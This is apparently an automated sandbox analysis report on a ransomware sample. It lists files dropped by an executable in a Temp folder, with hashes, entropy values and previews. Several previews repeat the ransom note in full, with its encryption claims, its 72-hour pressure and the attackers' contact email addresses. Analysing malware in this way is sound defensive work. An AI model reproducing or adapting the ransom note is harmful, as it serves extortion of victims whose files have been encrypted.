                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4535
                                                                                                                                              Entropy (8bit):7.9572380015790305
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:hyuSt9HSb4V3p//Fuic5+zbCMJOGtY8dAONjrVIV6xF:hyuSXS0V3JNuKzbCJ8dAsxF
                                                                                                                                              MD5:9E22DEA95B2145FB5DF4FEF9CC670257
                                                                                                                                              SHA1:6821A3EEFBE48EF596CF3122C05D0E610EBD72C0
                                                                                                                                              SHA-256:7421B9BA021279BEA8A89E4578E5996DC1BD7A040952122FF2D02EAECB267A56
                                                                                                                                              SHA-512:CFF81A5439633EE1D153DAC7B14B1D1403E0A201A4C6218E414CCC5655DF5669FE8FC67A5C39700B559620D765F69AB2164F8C0D9C453B2FD5524B4C6CE20A81
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.kV.....;f F.....;y..-J.2K9...8....-.K5..0..M.U./.t.w..k..W6.T...K...r....k.......).e.w.8p.+..$..J.If...OL./7.s.......1...w../..9.....}2H....y....*.Q..R..4"...........$...Ub|.,Z. @...p.hlY.F.\O.#Fb..y0.O>...1...[..p...Z..z....)g#)=...&..W...t.6-s.C.lQ.0....:~...`..|.y..p..l...!@.Dh.......V..U.h.........$y|^..|S.... m.~.H..)...nsNK...$#..;......9....i....M.C..M.'._sU...0...K0w..#w..'.$R..K.zF.E...>iy..;1B.......d`.......q.\o.t.......T'...:P.ny;B@C..%.hH..&.$c_L}...hX.}.G3_..JW5{..O>(...!..Tb.LB{b}.uz\K.t...,do.BFI.4...4wg...o+...Q.Zac.c.,.{.L.f..L3..x1...OG8Hz.1@n.Zq.."....L[We....C.6..P'.5...VD..a....rxO.QY.....)........>#.(3. 3.S...c.O...,.6.......`.....CB..UZ.F..!.IGW......T.jb..x.+.&...-.*.N...|.c=.Hq.....G..`.....+.zk....by...Y....8......SF..F.J.?Z....G..s..;h...#...b...c.=..\.6.....h......$d...J..I.u.8.`..O...Gg.E:..s....g+o.f.....\........GE...q..QV...K.,d..|.4....4...A.(.HIoa..;U.g.f..dTsM?.d..)9...........Y....6.h.Qm~.C.S..YpjH..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4535
                                                                                                                                              Entropy (8bit):7.9572380015790305
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:hyuSt9HSb4V3p//Fuic5+zbCMJOGtY8dAONjrVIV6xF:hyuSXS0V3JNuKzbCJ8dAsxF
                                                                                                                                              MD5:9E22DEA95B2145FB5DF4FEF9CC670257
                                                                                                                                              SHA1:6821A3EEFBE48EF596CF3122C05D0E610EBD72C0
                                                                                                                                              SHA-256:7421B9BA021279BEA8A89E4578E5996DC1BD7A040952122FF2D02EAECB267A56
                                                                                                                                              SHA-512:CFF81A5439633EE1D153DAC7B14B1D1403E0A201A4C6218E414CCC5655DF5669FE8FC67A5C39700B559620D765F69AB2164F8C0D9C453B2FD5524B4C6CE20A81
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.kV.....;f F.....;y..-J.2K9...8....-.K5..0..M.U./.t.w..k..W6.T...K...r....k.......).e.w.8p.+..$..J.If...OL./7.s.......1...w../..9.....}2H....y....*.Q..R..4"...........$...Ub|.,Z. @...p.hlY.F.\O.#Fb..y0.O>...1...[..p...Z..z....)g#)=...&..W...t.6-s.C.lQ.0....:~...`..|.y..p..l...!@.Dh.......V..U.h.........$y|^..|S.... m.~.H..)...nsNK...$#..;......9....i....M.C..M.'._sU...0...K0w..#w..'.$R..K.zF.E...>iy..;1B.......d`.......q.\o.t.......T'...:P.ny;B@C..%.hH..&.$c_L}...hX.}.G3_..JW5{..O>(...!..Tb.LB{b}.uz\K.t...,do.BFI.4...4wg...o+...Q.Zac.c.,.{.L.f..L3..x1...OG8Hz.1@n.Zq.."....L[We....C.6..P'.5...VD..a....rxO.QY.....)........>#.(3. 3.S...c.O...,.6.......`.....CB..UZ.F..!.IGW......T.jb..x.+.&...-.*.N...|.c=.Hq.....G..`.....+.zk....by...Y....8......SF..F.J.?Z....G..s..;h...#...b...c.=..\.6.....h......$d...J..I.u.8.`..O...Gg.E:..s....g+o.f.....\........GE...q..QV...K.,d..|.4....4...A.(.HIoa..;U.g.f..dTsM?.d..)9...........Y....6.h.Qm~.C.S..YpjH..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):710
                                                                                                                                              Entropy (8bit):7.726901406284001
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Y668KjvzJmOC9Py3al3rkKxXux8nKczs6K1vt13q3IX6KWnhwpRU7JnDxXwn:Y6Kjvz3C9E0PlKOKCTKtXaM6nEREDxg
                                                                                                                                              MD5:3941AB549350C0F23CE598C35A9B6583
                                                                                                                                              SHA1:DD4A9B566A3C12B215A5B9EAFC5BE6C0B2C9B8AA
                                                                                                                                              SHA-256:D4C82543902835D6DE2FC8F240C5C3C9D89A1809EA0EE03C639524522A97AEBB
                                                                                                                                              SHA-512:BEB5C81208A74DB5CA783EB5D692FB7F419C3C1263C0F8936417602B89C79C7E034A7780DE8A5D29C06DF50051AC6505A2A5B48C3B1BDE15D9A6ECBC6DBFC7EA
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.5.>?.......Ow^-7..`.....,.....:....g..b..u....E..J..'..wg..KM.(5u.O....5....q.9fY.XS...}.f./nq.VP...H...@..^x.b...e..+ .R.&H...=..@.!.W...B[.:...H...'..3...g_.>.[...9p^..?..WB.>...;:.;.S..2g.t..B.{...\p...L.........Q...:c.....jv.)5......n.....S#j........#....$..[`..4..rJ..2......mF..:q..w...D..\*..J..n*e...."g.*E..U~.'f.....H/0...0.........) ...md..N...q..`.@ Wi.j}5.o-.+...Ka..@r..%..[y.6.......V.}.tkSTp.q\xA..C+...8787d8846c"}J....$..d.>[.....L..OYEt......,..q.She.X.@243.g..gw..).5..AZ#.G...r..k~..J~=_....<.../l.$AV.....]..j..UW..'m.5\".M...%\^...Y?....F.d.W....4...l..[.:.\..!t........s.H^..M..C;........:.,/.j...."...q+&.t...?d...i..t..4.n..>@.~..c....4.8.....z.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):710
                                                                                                                                              Entropy (8bit):7.726901406284001
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:Y668KjvzJmOC9Py3al3rkKxXux8nKczs6K1vt13q3IX6KWnhwpRU7JnDxXwn:Y6Kjvz3C9E0PlKOKCTKtXaM6nEREDxg
                                                                                                                                              MD5:3941AB549350C0F23CE598C35A9B6583
                                                                                                                                              SHA1:DD4A9B566A3C12B215A5B9EAFC5BE6C0B2C9B8AA
                                                                                                                                              SHA-256:D4C82543902835D6DE2FC8F240C5C3C9D89A1809EA0EE03C639524522A97AEBB
                                                                                                                                              SHA-512:BEB5C81208A74DB5CA783EB5D692FB7F419C3C1263C0F8936417602B89C79C7E034A7780DE8A5D29C06DF50051AC6505A2A5B48C3B1BDE15D9A6ECBC6DBFC7EA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.5.>?.......Ow^-7..`.....,.....:....g..b..u....E..J..'..wg..KM.(5u.O....5....q.9fY.XS...}.f./nq.VP...H...@..^x.b...e..+ .R.&H...=..@.!.W...B[.:...H...'..3...g_.>.[...9p^..?..WB.>...;:.;.S..2g.t..B.{...\p...L.........Q...:c.....jv.)5......n.....S#j........#....$..[`..4..rJ..2......mF..:q..w...D..\*..J..n*e...."g.*E..U~.'f.....H/0...0.........) ...md..N...q..`.@ Wi.j}5.o-.+...Ka..@r..%..[y.6.......V.}.tkSTp.q\xA..C+...8787d8846c"}J....$..d.>[.....L..OYEt......,..q.She.X.@243.g..gw..).5..AZ#.G...r..k~..J~=_....<.../l.$AV.....]..j..UW..'m.5\".M...%\^...Y?....F.d.W....4...l..[.:.\..!t........s.H^..M..C;........:.,/.j...."...q+&.t...?d...i..t..4.n..>@.~..c....4.8.....z.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):15586
                                                                                                                                              Entropy (8bit):7.374121435310941
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:tM7XxgKPOVtDUpNqNfhzIiczJiR8cx5W2M:iWDU7qN5Hw8Zxs2M
                                                                                                                                              MD5:5154323E8FF02531C74A64523223B158
                                                                                                                                              SHA1:FC824A822ED4468CB6096CF0935C66CFB7A01312
                                                                                                                                              SHA-256:8A5CFF460F6F24EA00F23FC87D781DDAA8262A2C151978851E7C070F11D7C147
                                                                                                                                              SHA-512:57E7AEBD755863AC68A23A41EF58A4C944D1DF01EDC1E7A3C6DF85FCD0040025328BF0B4CC6F55A2F01766DC4E37681EA924CCD7AC500C85DC2432043222E7F3
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:...w.z.#.$.p.{.....M"A..Z.C.....r-."._..*......6..I5.....7.yu.7..Q.c~>[.6....{;...............K..}....cmDU)...q.........s,a(.s."...(........W1.P..s..!...../@.".{....=9.=L....8...pi8Q..]RH.BUK.0..\x<..f....clYp.h.c.....2...5(@=.[...Z....vs.Z..0tn<.h..`<b.....6..ui.,....9F"W...c.)%..J....Se..6y.E....#.H.%Y5...FP...Kr.. K..`.x... .wm.Aq.....Y..QF.(.#...Y.}...J.9B.d...."i^.b..[MK.S>.3.>.r...*A#.J..>.'/..M.)..B.[.....lz........Vnm.\d..D.\.|.U.\D...YS>...l..|ew9+P........8..@.NrW]O....[d..U7'5.<%...o....'S2....G..'....K./..V.G......1....9.../m.y"H.K:.".#....DXe..\.9..}.%*...uF..Q...P.`..7.c....C7....u?..P....$.-..4#...x./...r.......b.C.5...Z.5..\.....5.0......K..xk7..$<.9~....).{.z...._c_....-.y......2Z......:.\.&....g[.....Nm....."..L..m...h)..7....7/]..b...4........H.E.4...p.3..+.).....c.&.u5...;.~..>.. ..j-c.S...%)8..U.>.48..,..._i...>....|r1J..7]....[Q.$...gT.....k,.4..|z.b......q........-N...........S..F.J0I;...".|......j..e...k..^.p...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):15586
                                                                                                                                              Entropy (8bit):7.374121435310941
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:tM7XxgKPOVtDUpNqNfhzIiczJiR8cx5W2M:iWDU7qN5Hw8Zxs2M
                                                                                                                                              MD5:5154323E8FF02531C74A64523223B158
                                                                                                                                              SHA1:FC824A822ED4468CB6096CF0935C66CFB7A01312
                                                                                                                                              SHA-256:8A5CFF460F6F24EA00F23FC87D781DDAA8262A2C151978851E7C070F11D7C147
                                                                                                                                              SHA-512:57E7AEBD755863AC68A23A41EF58A4C944D1DF01EDC1E7A3C6DF85FCD0040025328BF0B4CC6F55A2F01766DC4E37681EA924CCD7AC500C85DC2432043222E7F3
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...w.z.#.$.p.{.....M"A..Z.C.....r-."._..*......6..I5.....7.yu.7..Q.c~>[.6....{;...............K..}....cmDU)...q.........s,a(.s."...(........W1.P..s..!...../@.".{....=9.=L....8...pi8Q..]RH.BUK.0..\x<..f....clYp.h.c.....2...5(@=.[...Z....vs.Z..0tn<.h..`<b.....6..ui.,....9F"W...c.)%..J....Se..6y.E....#.H.%Y5...FP...Kr.. K..`.x... .wm.Aq.....Y..QF.(.#...Y.}...J.9B.d...."i^.b..[MK.S>.3.>.r...*A#.J..>.'/..M.)..B.[.....lz........Vnm.\d..D.\.|.U.\D...YS>...l..|ew9+P........8..@.NrW]O....[d..U7'5.<%...o....'S2....G..'....K./..V.G......1....9.../m.y"H.K:.".#....DXe..\.9..}.%*...uF..Q...P.`..7.c....C7....u?..P....$.-..4#...x./...r.......b.C.5...Z.5..\.....5.0......K..xk7..$<.9~....).{.z...._c_....-.y......2Z......:.\.&....g[.....Nm....."..L..m...h)..7....7/]..b...4........H.E.4...p.3..+.).....c.&.u5...;.~..>.. ..j-c.S...%)8..U.>.48..,..._i...>....|r1J..7]....[Q.$...gT.....k,.4..|z.b......q........-N...........S..F.J0I;...".|......j..e...k..^.p...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12395
                                                                                                                                              Entropy (8bit):6.035605758316488
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:AoH7HDxpyCCEGPJxsqmZFlKBIWQC3bqbqbbbo2:lHxpGIqmZLKBIWQC3bqbqbbbo2
                                                                                                                                              MD5:31F230C472BBDB0E543813B8E7BF2E49
                                                                                                                                              SHA1:AEFB8198B7AFAFCEE0A4882D2F5508BBACDE6ECC
                                                                                                                                              SHA-256:3FCC6A99FEF888C6516E05FC144A9B43F4E3CE8F194EF0017437AE05E3FD2496
                                                                                                                                              SHA-512:4B00036E591FF04279439A5E9FEA90A208D936FC6D12E9270E53B9735856801D21A9C8E87B5BD1F8C9BC95B4AE81009EEF9952596A92375478FE107CBFBF42E5
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.I..Kf.....Z/.da...Lvz.4...{9..R...."%./.cB........16....K..%...s8.JM.....V.....I....O^.....S@.+...o.D8.iM=d.r.jU.o.Gc.Y.......o..w...:v.......W...n.../..Q+...Qm..u.}.[..xX)3.U.............9.b&.B.g..z..q..,[..HL).R. ..|.[.j...b.i..>.....9...rU.yp....P[..x..:'.......m..E.-..D.<................;.BD..WU.Ay..O}0.3D7...T./..:..-<?.`W.8!..y.q..2..]k:tm.d...T.S..;[.)........ .xoN.......u.....{.2u..G.{%)....=........<%..<..J>-_U-.s.r...B.Q.&Wx..z.>v.AA.S......+...7./...9T.? .E=p.C...26...."......C.r..AD..t..@...Z.9. =0.:G_..s9...z$w.....u..u..&r.3.N.k|Dd..*.k...C.A?.w#.a..k<*?1m.I.....'h:.0...Zor4.p..3d..r..Z.........aL.Q.3...k.....F.6(..6.....?...#L.b.A.<..AV~].?.EQ<.ph...g.e....,JD}...{@/x?..3`NC.HO..xK..J.uW..$.|.D.".8q... ....=+X..5%.$SE.g.....hm.;n...J..].4.D..1.orV..(...X5...k.1..q8.^.%.r$7..,.y.5...Iv.n..W..$..E.!..]z!,q........0..cf..1......#J..p..r.G..n..|...!t@...P.r.O..3.Qg....y..u....o.....'......P....]W^.?%.n.V.~..5qp..o.~...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12395
                                                                                                                                              Entropy (8bit):6.035605758316488
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:AoH7HDxpyCCEGPJxsqmZFlKBIWQC3bqbqbbbo2:lHxpGIqmZLKBIWQC3bqbqbbbo2
                                                                                                                                              MD5:31F230C472BBDB0E543813B8E7BF2E49
                                                                                                                                              SHA1:AEFB8198B7AFAFCEE0A4882D2F5508BBACDE6ECC
                                                                                                                                              SHA-256:3FCC6A99FEF888C6516E05FC144A9B43F4E3CE8F194EF0017437AE05E3FD2496
                                                                                                                                              SHA-512:4B00036E591FF04279439A5E9FEA90A208D936FC6D12E9270E53B9735856801D21A9C8E87B5BD1F8C9BC95B4AE81009EEF9952596A92375478FE107CBFBF42E5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.I..Kf.....Z/.da...Lvz.4...{9..R...."%./.cB........16....K..%...s8.JM.....V.....I....O^.....S@.+...o.D8.iM=d.r.jU.o.Gc.Y.......o..w...:v.......W...n.../..Q+...Qm..u.}.[..xX)3.U.............9.b&.B.g..z..q..,[..HL).R. ..|.[.j...b.i..>.....9...rU.yp....P[..x..:'.......m..E.-..D.<................;.BD..WU.Ay..O}0.3D7...T./..:..-<?.`W.8!..y.q..2..]k:tm.d...T.S..;[.)........ .xoN.......u.....{.2u..G.{%)....=........<%..<..J>-_U-.s.r...B.Q.&Wx..z.>v.AA.S......+...7./...9T.? .E=p.C...26...."......C.r..AD..t..@...Z.9. =0.:G_..s9...z$w.....u..u..&r.3.N.k|Dd..*.k...C.A?.w#.a..k<*?1m.I.....'h:.0...Zor4.p..3d..r..Z.........aL.Q.3...k.....F.6(..6.....?...#L.b.A.<..AV~].?.EQ<.ph...g.e....,JD}...{@/x?..3`NC.HO..xK..J.uW..$.|.D.".8q... ....=+X..5%.$SE.g.....hm.;n...J..].4.D..1.orV..(...X5...k.1..q8.^.%.r$7..,.y.5...Iv.n..W..$..E.!..]z!,q........0..cf..1......#J..p..r.G..n..|...!t@...P.r.O..3.Qg....y..u....o.....'......P....]W^.?%.n.V.~..5qp..o.~...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1389
                                                                                                                                              Entropy (8bit):7.881852111950271
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:z+ypFJZS+SWvTZ8FT534GzU4kph++W4YN2ivy3LfXCIsDfQC/8sFIg/7AIkc:z+sJQ+SWbZRGz6DDHF3Glx/8GIgVkc
                                                                                                                                              MD5:B471C0D3A1C53C7F3B409757EBB11948
                                                                                                                                              SHA1:95099337DC50E9A5FC70CEC3E8FBDBE02A33E7ED
                                                                                                                                              SHA-256:24F509815DBA9BC39442ECB6329066EBCA08414C7ECDF4E0B9C657EF057CED66
                                                                                                                                              SHA-512:55DCC7DAF546AAFDF8DE584D5DAFAE3C235EABAE76F48FE64C1C0DFC60EE51C847E997D8590D0ECB8B9F7DE155FD8845EC0BB0F0BA67C795180A3B3253C3F3C6
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:....mP...{.z..sZ.kS.%98.......t.n.bZ0..$..@.M:V.?.H....V<..*.|.M..>....z6..m...k..BfD...r.#.\+.w....G..ME......}%h#Z...L.G.} ......Q.%...=$0.!Zi.h&.Q,.5.p.m.......<.x.t..f....c&{K..1.v[g...u......{.....yvc..+...[r.X[........m]G.1..%s..A...:.$g.!W(?..3..3.n.<...f......^...K....'.. ...B...c.#..v..R#\.o..L.U....\.:.$)wM.O..9.....M...~3..eL5g.D...C|X'z..W.Y.X..e..Lv.r.*."j...9.j.....>..<.q.m.Q..W..u^.d...S.:R@+1.P.d!.;T#..l...T.....w1Sn...L.4..,?X.6.Y..-.R.B...f.IW.....&..u-...9..%Sf..'.M6....?...n..;l.....o.$.._...H..j..`..........DHIj.%.p/.Z...]..u..!.K3..(......5P....8s.:O.J...er...i?.Y..a.i....xL.....B...p8..y.t;G...Z|pJC|T.R6.......l_...M...U....pz.J.'^uxW./.......Nf .J...=.,1...E.....m..v..6.O.....:e)z.W.z...<.......z.(.o.>5F\.b.u.f...[.vD...I......F..C^..H.z.Z........aG...^..%&.8...E..a.7..P.H..)....R.u?I..u$..W/........F."...d....^.....r;]...O.^s....n}(.7....,..0....b.2....q{........T.u....4......S.;.mc.b...6...Y1_.._I4.N....d7j.j./
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1389
                                                                                                                                              Entropy (8bit):7.881852111950271
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:z+ypFJZS+SWvTZ8FT534GzU4kph++W4YN2ivy3LfXCIsDfQC/8sFIg/7AIkc:z+sJQ+SWbZRGz6DDHF3Glx/8GIgVkc
                                                                                                                                              MD5:B471C0D3A1C53C7F3B409757EBB11948
                                                                                                                                              SHA1:95099337DC50E9A5FC70CEC3E8FBDBE02A33E7ED
                                                                                                                                              SHA-256:24F509815DBA9BC39442ECB6329066EBCA08414C7ECDF4E0B9C657EF057CED66
